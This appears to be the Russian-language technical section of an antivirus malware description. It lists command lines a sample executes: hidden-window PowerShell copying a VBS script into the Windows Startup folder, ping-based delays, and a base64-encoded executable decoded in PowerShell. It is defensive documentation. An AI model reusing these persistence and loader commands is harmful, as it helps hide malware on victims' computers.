Техническая информация
- '<SYSTEM32>\cmd.exe' /c ping 127.0.0.1 -n 10 & powershell -command [System.IO.File]::Copy('<SYSTEM32>\<Имя файла>.vbs','C:\Users\' + [Environment]::UserName + '\AppData\Roaming\Microsoft\Windows\Start Menu\Program...' (со скрытым окном)
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' [Byte[]] $rOWg = [system.Convert]::FromBase64string('TVqQAAMAAAAEAAAA//8AALgAAAAAAAAAQAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAgAAAAA4fug4AtAnNIbgBTM0hVGhpcyBwcm9ncmFtIGNhbm5vdCBiZSBydW4g...' (со скрытым окном)
- '<SYSTEM32>\cmd.exe' /c ping 127.0.0.1 -n 10 & powershell -command [System.IO.File]::Copy('<SYSTEM32>\<Имя файла>.vbs','C:\Users\' + [Environment]::UserName + '\AppData\Roaming\Microsoft\Windows\Start Menu\Program...
- '<SYSTEM32>\ping.exe' 127.0.0.1 -n 10
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -command [System.IO.File]::Copy('<SYSTEM32>\<Имя файла>.vbs','C:\Users\' + [Environment]::UserName + '\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\ zIw.vbs')